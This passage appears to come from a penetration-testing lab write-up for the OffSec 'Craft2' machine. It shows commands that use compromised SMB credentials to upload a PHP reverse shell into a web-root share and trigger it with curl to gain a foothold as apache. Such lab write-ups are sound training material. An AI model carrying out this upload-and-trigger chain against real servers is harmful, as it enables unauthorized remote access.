Arbitrary File Upload
It has been identified that the compromised thecybergeek user has write access to the WebApp share that is mirroring the web root directory of the target web application.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ smbclient //craft.offsec/WebApp -U 'thecybergeek%winniethepooh' -c 'prompt; put shell.php'
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
putting file shell.php as \shell.php (114.9 kb/s) (average 114.9 kb/s)PHP reverse shell payload uploaded
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ curl -s http://craft.offsec/shell.phpInvoking..
/Practice/Craft2/3-Exploitation/attachments/{B44ADB39-6FA9-44CE-85E7-01B27D2832AD}.png)
Initial Foothold established to the CRAFT2 host as the apache account via arbitrary file upload